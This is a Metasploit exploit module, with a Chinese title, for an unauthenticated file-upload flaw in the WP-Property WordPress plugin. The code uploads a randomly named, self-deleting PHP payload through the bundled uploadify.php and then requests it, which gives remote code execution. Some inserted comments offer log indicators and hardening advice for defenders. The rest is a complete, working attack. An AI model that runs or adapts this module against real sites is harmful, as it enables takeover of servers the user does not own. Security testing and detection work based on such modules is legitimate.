WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

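# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (versions <= 1.35.0 according to the module description).
# The plugin ships a third-party uploadify.php that accepts a multipart upload
# without authentication; the module then requests whatever location the
# upload script returns.
#
# Notes for defenders reading this listing:
# * Web logs: look for a POST to
#   .../wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#   carrying a multipart "Filedata" part whose filename ends in .php, followed
#   by a GET for a .php file at the path the upload response returned.
# * Hardening: update the plugin beyond the affected range named in the
#   description, remove or block direct access to the bundled uploadify.php,
#   and deny PHP execution in upload/temp directories.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (name, references, targets) and the single
  # user option TARGETURI, the base path of the WordPress installation.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the presence of the bundled upload script.
  #
  # Returns CheckCode::Appears when uploadify.php answers with HTTP 200 and
  # CheckCode::Unknown when there is no response or any other status.
  # The probe does not read the plugin version, so "Appears" only says the
  # script is reachable; it is an indication, not a confirmation.
  def check
    uri = target_uri.path
    # Ensure the base path ends in '/' before the plugin path is appended.
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Uploads a randomly named .php file through uploadify.php and then requests
  # the location returned in the upload response.
  #
  # Fails with Failure::UnexpectedReply when the upload request gets no
  # response, a non-200 status, or a body that does not mention the file name.
  def exploit
    uri = target_uri.path
    # Ensure the base path ends in '/' before the plugin path is appended.
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # Five random letters plus ".php": there is no fixed file name to alert
    # on, so detection has to key on the endpoint and the extension.
    @payload_name = "#{rand_text_alpha(5)}.php"
    # NOTE(review): the :unlink_self option name suggests the dropped file
    # deletes itself after running, in which case it may no longer be on disk
    # during later forensics; confirm against the PhpEXE mixin.
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Multipart body: the file in "Filedata" and the destination in "folder".
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Strip the CRLF that precedes a boundary marker at the start of a line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # NOTE(review): the '.' in the interpolated name is not escaped, so this
    # pattern is slightly looser than a literal comparison of the file name.
    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body of the upload script is used verbatim as the next URI.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end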

不要问我这写的是什么 怎么利用 我是说msf.
